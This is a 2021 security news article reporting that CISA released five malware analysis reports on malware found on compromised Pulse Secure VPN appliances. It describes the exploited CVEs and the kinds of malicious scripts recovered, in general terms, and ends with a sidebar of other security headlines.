27 August 2021

CISA releases MARs on malware targeting Pulse Secure devices


CISA releases MARs on malware targeting Pulse Secure devices

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published five malware analysis reports (MARs) related to malicious files discovered on compromised Pulse Secure devices.

The MARs include details on the tactics, techniques, and procedures (TTPs) employed by threat actors, as well as Indicators of Compromise (IoCs) related to the attacks.

Threat actors have been targeting Pulse Connect Secure VPN appliances exploiting various vulnerabilities affecting the product, including flaws that came to light earlier this year - CVE-2021-22893 and CVE-2021-22937. The first one is an improper authentication issue, which allows a remote attacker to bypass authentication process and compromise the affected device, and the latter is an arbitrary file upload vulnerability, which can be exploited by a remote hacker to compromise the vulnerable system.

The malware samples recovered from compromised Pulse Secure devices and analyzed by CISA include the modified CGI scripts that allowed an attacker to gain remote access to a target system, a malicious shell script that could log a valid user’s username and password credentials into a file stored on disk, some shell scripts designed to modify a Pulse Secure Perl Common Gateway Interface (CGI) script file in place to become a webshell, a file designed to intercept certificate-based multi-factor authentication, and two Perl scripts that execute the attacker's commands stored in the environment variable.

“CISA encourages users and administrators to review the following five malware analysis reports (MARs) for threat actor tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), and review CISA’s Alert, Exploitation of Pulse Connect Secure Vulnerabilities, for more information,” the agency said.


Back to the list

Latest Posts

Windows MSHTML bug used in ransomware attacks, Microsoft says

Windows MSHTML bug used in ransomware attacks, Microsoft says

According to the Windows maker, in the wild exploitation of CVE-2021-40444 began on August 18.
17 September 2021
State-backed hackers actively exploiting recently disclosed Zoho RCE bug

State-backed hackers actively exploiting recently disclosed Zoho RCE bug

The targeted entities include academic institutions, defense contractors, as well as critical infrastructure entities.
17 September 2021
Free REvil/Sodinokibi ransomware universal decryptor released

Free REvil/Sodinokibi ransomware universal decryptor released

The tool works for all REvil victims whose files were encrypted in attacks prior to July 13, 2021.
17 September 2021
Featured vulnerabilities
Multiple vulnerabilities in cflinuxfs3
Medium Patched | 17 Sep, 2021
Information disclosure in cflinuxfs3
Medium Patched | 17 Sep, 2021
Information disclosure in Git
Medium Patched | 17 Sep, 2021
Multiple vulnerabilities in GLPI
Medium Patched | 17 Sep, 2021
Multiple vulnerabilities in cflinuxfs3
Medium Patched | 17 Sep, 2021